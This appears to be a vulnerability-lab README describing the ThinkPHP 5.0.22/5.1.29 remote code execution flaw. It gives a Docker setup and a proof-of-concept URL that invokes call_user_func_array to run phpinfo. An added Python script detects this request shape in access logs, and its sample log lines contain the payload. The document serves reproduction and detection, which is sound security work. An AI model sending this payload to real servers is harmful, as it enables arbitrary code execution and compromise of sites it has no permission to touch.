ldqsmile and JrDw0 Translate/thinkphp5-RCE (#89)
* Rename README.md to README.zh-cn.md

* Create README.md

* Update README.md

* Update README.md
Latest commit 34bb706 Dec 19, 2018
Type Name Latest commit message Commit time
1.png add manual Dec 12, 2018
README.md Translate/thinkphp5-RCE (#89) Dec 19, 2018
README.zh-cn.md Translate/thinkphp5-RCE (#89) Dec 19, 2018
docker-compose.yml

README.md

Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability

Chinese version

ThinkPHP is an extremely widely used PHP development framework in China. In version 5, the framework processes the controller name incorrectly, so if the website does not have mandatory routing enabled (which is the default), a request can execute any method, resulting in a remote code execution (RCE) vulnerability.

Environment Setup

Run the following command to start the environment (ThinkPHP version: 5.0.20):

docker-compose up -d

Visit http://your-ip:8080 and you'll see the default page of ThinkPHP.

POC

Directly visit http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it will execute phpinfo.
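For spotting this request shape in web server logs, the following is an added example and not part of the original README or of ThinkPHP: it flags any request whose `s` route parameter carries a segment containing a backslash, which is how a namespaced class name such as `\think\app` ends up where a controller name belongs. The function names and the sample log lines are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so %5C and %255C both end up as a backslash."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def namespaced_segment(target):
    """Return the first segment of the `s` route containing a backslash, else None."""
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key == "s":
            for segment in fully_unquote(value).split("/"):
                if "\\" in segment:
                    return segment
    return None

def scan(lines):
    """Return (line_number, segment) for every log line whose route is flagged."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        segment = namespaced_segment(match.group(1)) if match else None
        if segment is not None:
            hits.append((number, segment))
    return hits

# Constructed sample log lines (documentation IP range, invented timestamps).
QUERY = "&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"
SAMPLE_LOG = [
    r'203.0.113.5 - - [19/Dec/2018:10:00:01 +0000] "GET /index.php?s=/index/index/hello HTTP/1.1" 200 512',
    r'203.0.113.9 - - [19/Dec/2018:10:00:07 +0000] "GET /index.php?s=/Index/\think\app/invokefunction' + QUERY + ' HTTP/1.1" 200 90211',
    r'203.0.113.9 - - [19/Dec/2018:10:00:09 +0000] "GET /index.php?s=/Index/%5Cthink%5Capp/invokefunction' + QUERY + ' HTTP/1.1" 200 90211',
    r'203.0.113.9 - - [19/Dec/2018:10:00:12 +0000] "GET /index.php?s=/Index/%255Cthink%255Capp/invokefunction' + QUERY + ' HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for number, segment in scan(SAMPLE_LOG):
        print(f"line {number}: namespaced controller segment {segment!r}")
```

Some servers escape the backslash when writing the log (for example as `\\` or `\x5C`); the line is still flagged because the segment still contains a backslash, but the reported segment then shows the escaped form.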
